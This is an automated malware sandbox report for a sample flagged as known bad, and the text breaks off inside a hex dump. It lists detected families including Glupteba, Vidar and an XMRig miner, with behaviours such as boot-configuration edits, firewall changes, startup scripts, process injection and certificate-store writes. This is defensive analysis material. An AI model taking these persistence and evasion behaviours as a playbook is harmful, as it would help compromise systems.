Analysis Overview
SHA256
8765a0a92fa60c2a4d21ca073dcf805f320c2e3d07703b97638b38888fe25d23
Threat Level: Known bad
The file file was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Fabookie
Glupteba payload
Glupteba
Vidar
Danabot
Detect Fabookie payload
Modifies boot configuration data using bcdedit
XMRig Miner payload
Downloads MZ/PE file
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Stops running service(s)
Drops file in Drivers directory
Blocklisted process makes network request
.NET Reactor proctector
UPX packed file
Drops startup file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Modifies system certificate store
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks processor information in registry
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-04 22:00
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-04 22:00
Reported
2023-10-04 22:03
Platform
win7-20230831-en
Max time kernel
18s
Max time network
149s
Command Line
Signatures
Amadey
Danabot
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Stops running service(s)
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5KBrTyNqjkzkfvnblop9vXu.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k4RZBA7IbOJzP9tFcB0Uxzr8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I9fjH7BPaqhRIbdsZsuw44gH.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X2YqWH1H43WyVCsftFGf25fs.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8Q07bsmA2SFivlZEMcwdn3hb.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\32QePm4KyaXGR23aqiWCYXU7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aqKNOYnM2WwyugEQZLP2WH2k.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\krf1bY6s7oSG5lwGiK0yR19v.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hfWzyh2UY8ErRZQrt8QdGnrZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFlDBBbXluGJT7fUQupu2wBz.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2408 set thread context of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c7